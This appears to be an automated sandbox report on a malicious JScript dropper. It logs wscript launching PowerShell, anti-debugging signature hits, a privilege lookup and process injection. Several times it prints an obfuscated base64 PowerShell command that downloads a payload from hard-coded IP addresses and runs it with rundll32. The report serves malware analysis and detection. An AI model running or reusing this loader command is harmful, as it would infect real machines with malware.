cmdline powershell -encodedcommand "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANgAxADsAJABjAG8AYgBzAHQAbwBuAGUAIAA9ACAAKAAiAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADIAMQAuADEANgAuADIAMwAyAC8AdwAwAEcALwBhAFUAaQBmAFcALABoAHQAdABwADoALwAvADEANQAxAC4AMgAzADYALgAxADQALgAxADIANwAvAEYAUQBvAEIAQgBRAC8ARwBEAG0AUABSAHQALABoAHQAdABwADoALwAvADEAOQAyAC4AMQAyADEALgAxADYALgAyADMAMwAvAFgAVABMAFkAMQBYAFEALwBKAHMAeQBwAHgASQB6ADUANgB4ACIAKQAuAHMAcABsAGkAdAAoACIALAAiACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEkAbgBmAGEAbgB0AGUAcwBWAGEAcwB0AGEAdABpAG8AbgAgAGkAbgAgACQAYwBvAGIAcwB0AG8AbgBlACkAIAB7AHQAcgB5ACAAewB3AGcAZQB0ACAAJABJAG4AZgBhAG4AdABlAHMAVgBhAHMAdABhAHQAaQBvAG4AIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAIAAxADYAIAAtAE8AIAAkAGUAbgB2ADoAVABFAE0AUABcAHAAZQBlAHIAaQBuAGcAQQB3AGEAcgBkAGUAZAAuAGMAbwBtAG0AdQBuAGkAdABhAHIAaQBhAG4ATQBlAHQAYQBnAGUAbgBpAGMAOwAgAGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABFAE0AUABcAHAAZQBlAHIAaQBuAGcAQQB3AGEAcgBkAGUAZAAuAGMAbwBtAG0AdQBuAGkAdABhAHIAaQBhAG4ATQBlAHQAYQBnAGUAbgBpAGMAKQAuAEwAZQBuAGcAdABoACAALQBnAGUAIAAxADMAMQAwADAAMAApAHsAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgBjAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAQQBBAGMAZwBCADEAQQBHADQAQQBaAEEAQgBzAEEARwB3AEEATQB3AEEAeQBBAEMAQQBBAEoAQQBCAGwAQQBHADQAQQBkAGcAQQA2AEEARgBRAEEAUgBRAEIATgBBAEYAQQBBAFgAQQBCAHcAQQBHAFUAQQBaAFEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEUARQBBAGQAdwBCAGgAQQBIAEkAQQBaAEEAQgBsAEEARwBRAEEATABnAEIAagBBAEcAOABBAGIAUQBCAHQAQQBIAFUAQQBiAGcAQgBwAEEASABRAEEAWQBRAEIAeQBBAEcAawBBAFkAUQBCAHUAQQBFADAAQQBaAFEAQgAwAEEARwBFAEEAWgB3AEIAbABBAEcANABBAGEAUQBCAGoAQQBDAHcAQQBWAEEAQgBwAEEARwAwAEEAWgBRAEEANwBBAEEAPQA9ACIAOwBiAHIAZQBhAGsAOwB9AH0AYwBhAHQAYwBoACAAewBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA0ADsAfQB9AA=="
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: wscript
parameters: "C:\Users\test22\AppData\Local\Temp\Mglf.js" Subjugal StalingradSkittery
filepath: wscript
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: powershell
parameters: -encodedcommand "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANgAxADsAJABjAG8AYgBzAHQAbwBuAGUAIAA9ACAAKAAiAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADIAMQAuADEANgAuADIAMwAyAC8AdwAwAEcALwBhAFUAaQBmAFcALABoAHQAdABwADoALwAvADEANQAxAC4AMgAzADYALgAxADQALgAxADIANwAvAEYAUQBvAEIAQgBRAC8ARwBEAG0AUABSAHQALABoAHQAdABwADoALwAvADEAOQAyAC4AMQAyADEALgAxADYALgAyADMAMwAvAFgAVABMAFkAMQBYAFEALwBKAHMAeQBwAHgASQB6ADUANgB4ACIAKQAuAHMAcABsAGkAdAAoACIALAAiACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEkAbgBmAGEAbgB0AGUAcwBWAGEAcwB0AGEAdABpAG8AbgAgAGkAbgAgACQAYwBvAGIAcwB0AG8AbgBlACkAIAB7AHQAcgB5ACAAewB3AGcAZQB0ACAAJABJAG4AZgBhAG4AdABlAHMAVgBhAHMAdABhAHQAaQBvAG4AIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAIAAxADYAIAAtAE8AIAAkAGUAbgB2ADoAVABFAE0AUABcAHAAZQBlAHIAaQBuAGcAQQB3AGEAcgBkAGUAZAAuAGMAbwBtAG0AdQBuAGkAdABhAHIAaQBhAG4ATQBlAHQAYQBnAGUAbgBpAGMAOwAgAGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABFAE0AUABcAHAAZQBlAHIAaQBuAGcAQQB3AGEAcgBkAGUAZAAuAGMAbwBtAG0AdQBuAGkAdABhAHIAaQBhAG4ATQBlAHQAYQBnAGUAbgBpAGMAKQAuAEwAZQBuAGcAdABoACAALQBnAGUAIAAxADMAMQAwADAAMAApAHsAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgBjAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAQQBBAGMAZwBCADEAQQBHADQAQQBaAEEAQgBzAEEARwB3AEEATQB3AEEAeQBBAEMAQQBBAEoAQQBCAGwAQQBHADQAQQBkAGcAQQA2AEEARgBRAEEAUgBRAEIATgBBAEYAQQBBAFgAQQBCAHcAQQBHAFUAQQBaAFEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEUARQBBAGQAdwBCAGgAQQBIAEkAQQBaAEEAQgBsAEEARwBRAEEATABnAEIAagBBAEcAOABBAGIAUQBCAHQAQQBIAFUAQQBiAGcAQgBwAEEASABRAEEAWQBRAEIAeQBBAEcAawBBAFkAUQBCAHUAQQBFADAAQQBaAFEAQgAwAEEARwBFAEEAWgB3AEIAbABBAEcANABBAGEAUQBCAGoAQQBDAHcAQQBWAEEAQgBwAEEARwAwAEEAWgBRAEEANwBBAEEAPQA9ACIAOwBiAHIAZQBhAGsAOwB9AH0AYwBhAHQAYwBoACAAewBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA0ADsAfQB9AA=="
filepath: powershell
1 1 0
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
parent_process wscript.exe martian_process "C:\Windows\System32\wscript.exe" "C:\Users\test22\AppData\Local\Temp\Mglf.js" Subjugal StalingradSkittery
parent_process wscript.exe martian_process wscript "C:\Users\test22\AppData\Local\Temp\Mglf.js" Subjugal StalingradSkittery
parent_process wscript.exe martian_process powershell -encodedcommand "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANgAxADsAJABjAG8AYgBzAHQAbwBuAGUAIAA9ACAAKAAiAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADIAMQAuADEANgAuADIAMwAyAC8AdwAwAEcALwBhAFUAaQBmAFcALABoAHQAdABwADoALwAvADEANQAxAC4AMgAzADYALgAxADQALgAxADIANwAvAEYAUQBvAEIAQgBRAC8ARwBEAG0AUABSAHQALABoAHQAdABwADoALwAvADEAOQAyAC4AMQAyADEALgAxADYALgAyADMAMwAvAFgAVABMAFkAMQBYAFEALwBKAHMAeQBwAHgASQB6ADUANgB4ACIAKQAuAHMAcABsAGkAdAAoACIALAAiACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEkAbgBmAGEAbgB0AGUAcwBWAGEAcwB0AGEAdABpAG8AbgAgAGkAbgAgACQAYwBvAGIAcwB0AG8AbgBlACkAIAB7AHQAcgB5ACAAewB3AGcAZQB0ACAAJABJAG4AZgBhAG4AdABlAHMAVgBhAHMAdABhAHQAaQBvAG4AIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAIAAxADYAIAAtAE8AIAAkAGUAbgB2ADoAVABFAE0AUABcAHAAZQBlAHIAaQBuAGcAQQB3AGEAcgBkAGUAZAAuAGMAbwBtAG0AdQBuAGkAdABhAHIAaQBhAG4ATQBlAHQAYQBnAGUAbgBpAGMAOwAgAGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABFAE0AUABcAHAAZQBlAHIAaQBuAGcAQQB3AGEAcgBkAGUAZAAuAGMAbwBtAG0AdQBuAGkAdABhAHIAaQBhAG4ATQBlAHQAYQBnAGUAbgBpAGMAKQAuAEwAZQBuAGcAdABoACAALQBnAGUAIAAxADMAMQAwADAAMAApAHsAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgBjAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAQQBBAGMAZwBCADEAQQBHADQAQQBaAEEAQgBzAEEARwB3AEEATQB3AEEAeQBBAEMAQQBBAEoAQQBCAGwAQQBHADQAQQBkAGcAQQA2AEEARgBRAEEAUgBRAEIATgBBAEYAQQBBAFgAQQBCAHcAQQBHAFUAQQBaAFEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEUARQBBAGQAdwBCAGgAQQBIAEkAQQBaAEEAQgBsAEEARwBRAEEATABnAEIAagBBAEcAOABBAGIAUQBCAHQAQQBIAFUAQQBiAGcAQgBwAEEASABRAEEAWQBRAEIAeQBBAEcAawBBAFkAUQBCAHUAQQBFADAAQQBaAFEAQgAwAEEARwBFAEEAWgB3AEIAbABBAEcANABBAGEAUQBCAGoAQQBDAHcAQQBWAEEAQgBwAEEARwAwAEEAWgBRAEEANwBBAEEAPQA9ACIAOwBiAHIAZQBhAGsAOwB9AH0AYwBhAHQAYwBoACAAewBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA0ADsAfQB9AA=="
parent_process wscript.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANgAxADsAJABjAG8AYgBzAHQAbwBuAGUAIAA9ACAAKAAiAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADIAMQAuADEANgAuADIAMwAyAC8AdwAwAEcALwBhAFUAaQBmAFcALABoAHQAdABwADoALwAvADEANQAxAC4AMgAzADYALgAxADQALgAxADIANwAvAEYAUQBvAEIAQgBRAC8ARwBEAG0AUABSAHQALABoAHQAdABwADoALwAvADEAOQAyAC4AMQAyADEALgAxADYALgAyADMAMwAvAFgAVABMAFkAMQBYAFEALwBKAHMAeQBwAHgASQB6ADUANgB4ACIAKQAuAHMAcABsAGkAdAAoACIALAAiACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEkAbgBmAGEAbgB0AGUAcwBWAGEAcwB0AGEAdABpAG8AbgAgAGkAbgAgACQAYwBvAGIAcwB0AG8AbgBlACkAIAB7AHQAcgB5ACAAewB3AGcAZQB0ACAAJABJAG4AZgBhAG4AdABlAHMAVgBhAHMAdABhAHQAaQBvAG4AIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAIAAxADYAIAAtAE8AIAAkAGUAbgB2ADoAVABFAE0AUABcAHAAZQBlAHIAaQBuAGcAQQB3AGEAcgBkAGUAZAAuAGMAbwBtAG0AdQBuAGkAdABhAHIAaQBhAG4ATQBlAHQAYQBnAGUAbgBpAGMAOwAgAGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABFAE0AUABcAHAAZQBlAHIAaQBuAGcAQQB3AGEAcgBkAGUAZAAuAGMAbwBtAG0AdQBuAGkAdABhAHIAaQBhAG4ATQBlAHQAYQBnAGUAbgBpAGMAKQAuAEwAZQBuAGcAdABoACAALQBnAGUAIAAxADMAMQAwADAAMAApAHsAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgBjAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAQQBBAGMAZwBCADEAQQBHADQAQQBaAEEAQgBzAEEARwB3AEEATQB3AEEAeQBBAEMAQQBBAEoAQQBCAGwAQQBHADQAQQBkAGcAQQA2AEEARgBRAEEAUgBRAEIATgBBAEYAQQBBAFgAQQBCAHcAQQBHAFUAQQBaAFEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEUARQBBAGQAdwBCAGgAQQBIAEkAQQBaAEEAQgBsAEEARwBRAEEATABnAEIAagBBAEcAOABBAGIAUQBCAHQAQQBIAFUAQQBiAGcAQgBwAEEASABRAEEAWQBRAEIAeQBBAEcAawBBAFkAUQBCAHUAQQBFADAAQQBaAFEAQgAwAEEARwBFAEEAWgB3AEIAbABBAEcANABBAGEAUQBCAGoAQQBDAHcAQQBWAEEAQgBwAEEARwAwAEEAWgBRAEEANwBBAEEAPQA9ACIAOwBiAHIAZQBhAGsAOwB9AH0AYwBhAHQAYwBoACAAewBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA0ADsAfQB9AA=="
Process injection Process 1608 resumed a thread in remote process 2144
Process injection Process 2144 resumed a thread in remote process 2276
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000300
suspend_count: 1
process_identifier: 2144
1 0 0

NtResumeThread

thread_handle: 0x000002e0
suspend_count: 1
process_identifier: 2276
1 0 0
file C:\Windows\SysWOW64\wscript.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe